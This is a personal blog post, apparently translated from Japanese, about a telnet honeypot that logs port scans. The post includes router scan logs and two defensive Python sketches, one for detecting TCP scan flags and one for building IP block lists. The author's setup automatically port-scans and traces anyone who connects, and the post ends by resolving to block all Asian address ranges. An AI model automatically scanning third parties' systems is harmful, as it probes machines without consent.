
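* Image borrowed from elsewhere. (sweat)
The battle began suddenly.
Prologue
Anyone trying to hack my IP address always gets banned (rejected) at the router without my even noticing, but it still feels unpleasant to be port-scanned continuously, so I set a trap to find out which countries most of these people come from.
I normally keep closed every unneeded port that could serve as a foothold for hacking, so I opened port 23 solely for this purpose, as a honeypot.
On port 23 (TELNET: does anyone still use it out in the wider world these days!?) I built a trap that accepts connections, and wrote a program so that whenever someone attempted to connect, it would run a traceroute, a port scan, and a whois lookup against them in real time and log the results. An IPS?
Action
Within an hour of setting the trap, the Chinese IPs in the table below started scanning.
Presumably, because they were hit with a real-time traceroute and port scan from my side when they connected, they launched further attacks in return (lol).
The router sounded the beep that signals a hacking attempt, and when I looked at the log they had been scanning with a variety of techniques. (lol)
When I blocked the attacking IPs on the server side, they switched IP addresses two or three times and attacked again. All of them were Chinese IPs.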
Date/time | Detection | Source address | | Destination address |
2020/05/16 22:11:44 | TCP SYN and FIN | 192.168.*.* | > | 177.73.245.96 |
2020/05/16 22:11:43 | TCP FIN and no ACK | 192.168.*.* | > | 177.73.245.96 |
2020/05/16 22:11:42 | TCP SYN and FIN | 192.168.*.* | > | 177.73.245.96 |
2020/05/16 22:11:39 | TCP FIN and no ACK | 192.168.*.* | > | 177.73.245.96 |
2020/05/16 22:11:38 | TCP SYN and FIN | 192.168.*.* | > | 177.73.245.96 |
2020/05/16 22:11:37 | TCP FIN and no ACK | 192.168.*.* | > | 177.73.245.96 |
2020/05/16 22:11:36 | TCP no bits set | 192.168.*.* | > | 177.73.245.96 |
2020/05/16 21:48:21 | TCP SYN and FIN | 192.168.*.* | > | 45.95.168.177 |
2020/05/16 21:48:20 | TCP FIN and no ACK | 192.168.*.* | > | 45.95.168.177 |
2020/05/16 21:48:19 | TCP SYN and FIN | 192.168.*.* | > | 45.95.168.177 |
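
The three detection labels in the table correspond to TCP flag combinations that no normal handshake produces. The following Python sketch is an added example, not the router's own logic: it classifies raw TCP headers into those labels. The precedence between overlapping rules and the `build_header` helper that constructs sample headers are assumptions.

```python
import struct
from collections import Counter
from typing import Optional

# TCP flag bits in the low byte of header bytes 12-13.
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20


def tcp_flags(segment: bytes) -> int:
    """Return the 8 flag bits of a raw TCP header (needs at least 20 bytes)."""
    if len(segment) < 20:
        raise ValueError("truncated TCP header")
    # Bytes 12-13: data offset (4 bits), reserved bits, then the flags.
    offset_and_flags, = struct.unpack_from("!H", segment, 12)
    return offset_and_flags & 0xFF


def classify(flags: int) -> Optional[str]:
    """Map a flag combination to the labels seen in the router log.

    Assumed precedence: SYN+FIN is checked before FIN-without-ACK,
    because a SYN+FIN probe without ACK would match both rules.
    """
    if flags == 0:
        return "TCP no bits set"        # NULL scan
    if flags & SYN and flags & FIN:
        return "TCP SYN and FIN"        # contradictory open+close
    if flags & FIN and not flags & ACK:
        return "TCP FIN and no ACK"     # FIN or Xmas-style probe
    return None                         # nothing anomalous in the flags


def build_header(flags: int, sport: int = 40000, dport: int = 23) -> bytes:
    """Constructed sample input: a minimal 20-byte TCP header."""
    return struct.pack("!HHIIHHHH", sport, dport, 0, 0,
                       (5 << 12) | flags, 1024, 0, 0)


def scan_summary(segments) -> Counter:
    """Count anomalous segments per label, ignoring normal traffic."""
    labels = (classify(tcp_flags(s)) for s in segments)
    return Counter(label for label in labels if label)


if __name__ == "__main__":
    sample = [build_header(f) for f in (0, SYN | FIN, FIN, FIN | PSH | URG,
                                        SYN, SYN | ACK, FIN | ACK)]
    for label, count in scan_summary(sample).items():
        print(f"{label}: {count}")
```
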
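Result
It seems we had entered a state of combat: Apache had the following attack entries in its log.
They probably have a script that runs through a fixed set of patterns.
I think they intend to break in using whichever attack technique gets a hit from these.
I have put a fair number of countermeasures in place so that the web server doesn't get hacked, so the attacks ended in failure and they seem to have given up.
The log follows.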
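Taking the lessons of this battle, voilà! I'm going to BAN every Asian range except my own!
What I did ad hoc against the hacking this time was a countermeasure on the server inside the router (inside the firewall), so I will apply a "sakoku" (national isolation) filter to the router itself so that port scans cannot happen in the first place.
The sakoku filter is the technique described on this web page.
Put simply, it is a filter that blocks all IP addresses of entire countries (Asian ones).
However, when the sakoku filter above is set up via Lua, the entries are not carried over from the "static filters" to the "applied filters", so it does not work. I therefore implemented it with a different method.
Currently, the IP address of anyone making unauthorized access is investigated in real time, and then the block list is pushed to the router.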
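
An added example (not the author's program) of the defensive half of this workflow in Python: it flags clients that request many distinct failing paths, the scripted pattern described under Result, and collapses them into a block list, widening to a /24 when several flagged hosts share one, as when the attackers switched addresses. The log lines are constructed with documentation addresses, the thresholds are assumptions, IPv4 is assumed, and pushing the list to a router is left out because it is model-specific.

```python
import ipaddress
import re
from collections import defaultdict

# Apache common/combined log line: client, timestamp, request line, status.
# Lines with a malformed request (e.g. "-") do not match and are skipped.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) ')

# Constructed sample log (RFC 5737 documentation addresses, made-up paths).
SAMPLE = """\
203.0.113.10 - - [16/May/2020:22:30:01 +0900] "GET /probe-a.php HTTP/1.1" 404 196
203.0.113.10 - - [16/May/2020:22:30:01 +0900] "GET /probe-b.php HTTP/1.1" 404 196
203.0.113.10 - - [16/May/2020:22:30:02 +0900] "GET /probe-c.php HTTP/1.1" 404 196
203.0.113.10 - - [16/May/2020:22:30:02 +0900] "GET /probe-d.php HTTP/1.1" 404 196
203.0.113.77 - - [16/May/2020:22:41:10 +0900] "GET /old/probe-a.php HTTP/1.1" 404 196
203.0.113.77 - - [16/May/2020:22:41:10 +0900] "GET /old/probe-b.php HTTP/1.1" 404 196
203.0.113.77 - - [16/May/2020:22:41:11 +0900] "GET /admin/setup.php HTTP/1.1" 404 196
203.0.113.77 - - [16/May/2020:22:41:11 +0900] "POST /xmlrpc.php HTTP/1.1" 403 199
198.51.100.5 - - [16/May/2020:22:50:00 +0900] "GET /probe-a.php?x=1 HTTP/1.1" 404 196
198.51.100.5 - - [16/May/2020:22:50:00 +0900] "GET /probe-a.php?x=2 HTTP/1.1" 404 196
198.51.100.5 - - [16/May/2020:22:50:01 +0900] "GET /probe-e.php HTTP/1.1" 404 196
198.51.100.5 - - [16/May/2020:22:50:01 +0900] "GET /probe-f.php HTTP/1.1" 404 196
198.51.100.5 - - [16/May/2020:22:50:02 +0900] "GET /probe-g.php HTTP/1.1" 404 196
192.0.2.20 - - [16/May/2020:23:00:00 +0900] "GET / HTTP/1.1" 200 5120
192.0.2.20 - - [16/May/2020:23:00:01 +0900] "GET /favicon.ico HTTP/1.1" 404 196
192.0.2.20 - - [16/May/2020:23:00:02 +0900] "GET /index.html HTTP/1.1" 200 5120
"""


def find_scanners(lines, min_distinct=4):
    """Return {client_ip: set of distinct failing paths} for likely scanners.

    A single 404 (a missing favicon) is normal; many different failing
    paths from one client indicates a scripted path list.
    """
    failed = defaultdict(set)
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ip, target, status = m.group(1), m.group(2), int(m.group(3))
        if status in (400, 403, 404):
            failed[ip].add(target.split("?", 1)[0])  # ignore query strings
    return {ip: paths for ip, paths in failed.items()
            if len(paths) >= min_distinct}


def blocklist(ips, prefix=24, min_hosts=2):
    """Turn flagged IPv4 addresses into a sorted list of networks to block.

    When at least min_hosts flagged addresses share one /prefix, block the
    whole prefix; otherwise block only the single host (/32).
    """
    by_net = defaultdict(list)
    for ip in ips:
        addr = ipaddress.ip_address(ip)
        net = ipaddress.ip_network(f"{addr}/{prefix}", strict=False)
        by_net[net].append(addr)
    nets = []
    for net, addrs in by_net.items():
        if len(addrs) >= min_hosts:
            nets.append(net)
        else:
            nets.extend(ipaddress.ip_network(a) for a in addrs)
    return sorted(ipaddress.collapse_addresses(nets))


if __name__ == "__main__":
    scanners = find_scanners(SAMPLE.splitlines())
    for net in blocklist(scanners):
        print(net)
```
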